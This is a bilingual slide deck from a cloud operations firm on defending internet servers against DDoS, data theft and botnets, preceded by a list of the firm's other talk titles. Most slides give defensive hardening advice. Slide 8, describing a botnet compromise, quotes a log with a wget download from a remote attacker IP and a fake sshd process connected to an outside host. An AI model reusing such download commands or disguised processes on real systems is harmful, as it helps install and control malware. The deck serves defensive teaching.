云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
 
AWS Summit OaaS Talk by ChinaNetCloud
AWS Summit OaaS Talk by ChinaNetCloudAWS Summit OaaS Talk by ChinaNetCloud
AWS Summit OaaS Talk by ChinaNetCloud
 
Running Internet Systems in China - The Details You Need to Succeed in Chines...
Running Internet Systems in China - The Details You Need to Succeed in Chines...Running Internet Systems in China - The Details You Need to Succeed in Chines...
Running Internet Systems in China - The Details You Need to Succeed in Chines...
 
Making Internet Operations Easier
Making Internet Operations EasierMaking Internet Operations Easier
Making Internet Operations Easier
 
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event BeijingInternet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
 
Big Data Security (ChinaNetCloud - Guiyang Conference)
Big Data Security (ChinaNetCloud - Guiyang Conference)Big Data Security (ChinaNetCloud - Guiyang Conference)
Big Data Security (ChinaNetCloud - Guiyang Conference)
 
Why Work at ChinaNetCloud
Why Work at ChinaNetCloudWhy Work at ChinaNetCloud
Why Work at ChinaNetCloud
 
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco eventCloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
 
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
Automatically Managing  Internet Operations  In The Cloud - 云计算平台的自动化运维Automatically Managing  Internet Operations  In The Cloud - 云计算平台的自动化运维
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
 
ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations
 
Clouds in China
Clouds in ChinaClouds in China
Clouds in China
 
ChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - Public Clouds in China OverviewChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - Public Clouds in China Overview
 
ChinaNetCloud - China Internet Infrastructure Summary
ChinaNetCloud - China Internet Infrastructure SummaryChinaNetCloud - China Internet Infrastructure Summary
ChinaNetCloud - China Internet Infrastructure Summary
 
Linux Memory Basics for SysAdmins - ChinaNetCloud Training
Linux Memory Basics for SysAdmins - ChinaNetCloud TrainingLinux Memory Basics for SysAdmins - ChinaNetCloud Training
Linux Memory Basics for SysAdmins - ChinaNetCloud Training
 
Networking Layer Basics - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud TrainingNetworking Layer Basics - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud Training
 
ChinaNetCloud Training - iptables Intro
ChinaNetCloud Training - iptables IntroChinaNetCloud Training - iptables Intro
ChinaNetCloud Training - iptables Intro
 

运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享

  • 1. Copyright © 2015 ChinaNetCloudServer Management  Cloud computing  System Consulting Running the World’s Internet Servers 运维安全:抵抗黑客攻击 云络 王 寒
  • 2. ChinaNetCloud – Solution Proposal *** Confidential *** 2 令人激动的互联网
  • 3. ChinaNetCloud – Solution Proposal *** Confidential *** 3 融入生活每一部分
  • 4. ChinaNetCloud – Solution Proposal *** Confidential *** 4 但,不是诸事如意
  • 5. ChinaNetCloud – Solution Proposal *** Confidential *** 5 当今三大安全问题 DDoS 数据盗窃 Botnets 僵尸网络
  • 6. ChinaNetCloud – Solution Proposal *** Confidential *** 6 Security Problem #1 – DDoS 第一安全问题-DDoS • For Fun 捣蛋 • Get Money 赚钱 • Competitors 竞争
  • 7. ChinaNetCloud – Solution Proposal *** Confidential *** 7 Security Problem #2 – Stealing Data 第二安全问题-数据盗窃 • Steal Money 偷钱 • Steal/Sell Data 偷数据 • Steal Code 偷代码
  • 8. ChinaNetCloud – Solution Proposal *** Confidential *** 8 Security Problem #3 – BotNETs 第三个安全问题-僵尸网络 • Break In 攻入 • Install Root Kit 安装 • Call home for control 呼叫 • Do evil 作恶 Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)
  • 9. ChinaNetCloud – Solution Proposal *** Confidential *** 9 四层安全 系统网络 代码 运维
  • 10. ChinaNetCloud – Solution Proposal *** Confidential *** 10 网络安全 • DDoS 攻击1 Overload Bandwidth 带宽超载 • DDoS 攻击2 Overload Servers 服务器超载 • Cloud Filtering – Anquanbao 安全宝 • CDN Support -CDN支持 • IDC Hardware -IDC 硬件 • Front of Application — WAF DDoS 策略
  • 11. ChinaNetCloud – Solution Proposal *** Confidential *** 11 系统安全 • Required – Basic protection 要求-基本的保护 • Basic filtering 基本的过滤 • NAT inbound • ssh, monitoring • NAT outbound • Backups, DNS, ntp, updates WAF 网页应用防火墙 传统防火墙 • Two key protections 两种主要的防护 • Protect Application Code 保护应用代码 • OWASP basics • SQL, XSS • Dedicated Hardware 专有硬件设备 • Palo Alto Networks • Software / Virtual 软件/虚拟服务 • Anquanbao - 安全宝 • Aliyun Cloud Shell - 云盾 • Software Module 软件模块 • modSecurity • DDoS Filtering & Limiting 过滤和限制 • IP, agent, url, session
  • 12. ChinaNetCloud – Solution Proposal *** Confidential *** 12 代码安全 —— OWASP项目 Key Points要点 • A1 – Injection • A2 – Auth & Session Mgmt • A3 – XSS • A7 – Function ACLs • A8 – CSRF • A9 – Insecure Components http://owasp.org.cn
  • 13. ChinaNetCloud – Solution Proposal *** Confidential *** 13 代码安全 —— 代码扫描 • Best practice 最佳实践 • Find new problems 找到新问题 • As you update 更新 • Third parties 第三方 • New exploits 新的改进
  • 14. ChinaNetCloud – Solution Proposal *** Confidential *** 14 运维安全 —— 经常被遗忘 • Often forgotten 经常被遗忘 • Often use defaults 经常采取默认设置 • Or random Google search 或用谷歌搜索配置 • Source of great danger 风险的发源地
  • 15. ChinaNetCloud – Solution Proposal *** Confidential *** 15 运维安全 —— 服务器 • Best practices 最佳实践 • Lots of small issues 许多细小问题 • Running user - 用户运行 • File permissions - 文件许可 • Dangerous uploads - PHP inside JPEGs 危险的上传 • SSL – Heartbleed, etc. APP 服务器Web 服务器 • Best Practices 最佳实践 • Delete example APPs 删除样例 • Delete tools (Tomcat) 删除工具 • Patch Software (Java!) 软件补丁
  • 16. ChinaNetCloud – Solution Proposal *** Confidential *** 16 运维安全 —— 服务器 数据库 • Use Best Practices 最佳实践 • Secure Configuration 安全配置 • Limited User Permission 限制用户许可 • Separate App & DBA User 区分APP和DBA用户 • Separate User for each App 区分每个APP的用户 • Safe File Permissions 安全的文件许可 • Log SQL if possible 尽可能记录SQL
  • 17. ChinaNetCloud – Solution Proposal *** Confidential *** 17 运维安全 —— 操作系统 • Hardened OS 加固 • Iptables 防火墙 • Run Users 用户运行 • File permissions 文件许可 • Logging 日志 • Scanning (ClamAV) 扫描 • Track activity 轨迹追踪 • Automate 自动 • System Updates 系统升级
  • 18. ChinaNetCloud – Solution Proposal *** Confidential *** 18 运维安全 —— 云平台 • Best Practice 最佳实践 • Control Access 控制登录权限 • Can delete EVERYTHING 会被意外删除 • Separate Backups 备份隔离 • Out of Cloud 在云之外 • MFA Delete on AWS AWS上删除MFA
  • 19. ChinaNetCloud – Solution Proposal *** Confidential *** 19 运维安全 —— 网络 • Generally okay, BUT • VPC on Clouds – Separate 使用公共云上隔离的私有网络 • Consider Out-of-Band Link (DDoS) 考虑带外数据链接 • Firewalls – Front & Middle 防火墙-前端&中间 • Secure Configuration 安全配置 • Separate test/dev network 区分测试/开发
  • 20. ChinaNetCloud – Solution Proposal *** Confidential *** 20 运维安全 —— 备份安全 • Backups ARE part of Security 备份属于安全管理的范畴 • If all else fails, use backups 若发生意外,使用备份 • Keep them Secure 安全备份 • Avoid Theft & Tampering 防止盗窃或恶意企图 • Read-Only is Best 最好采用只读 运维安全 —— 安全监控 运维安全 —— 审计 Deep Check to Find Problems 深入检查,发现问题
  • 21. ChinaNetCloud – Solution Proposal *** Confidential *** 总结 Security is Critically Important 安全非常重要 Increasingly Important 并且,越来越重要 Getting Harder 但也,越来越难 But more Tools 但,实用工具越来越多 Details & Experts Help 注重细节,并且需要专家帮助 • Deep Experience 丰富经验 • Experts at Every Level 全面专业 • Part of Overall Operations 是运维工作的一部分 云络可以帮您
  • 22. ChinaNetCloud – Solution Proposal *** Confidential *** 22 谢 谢!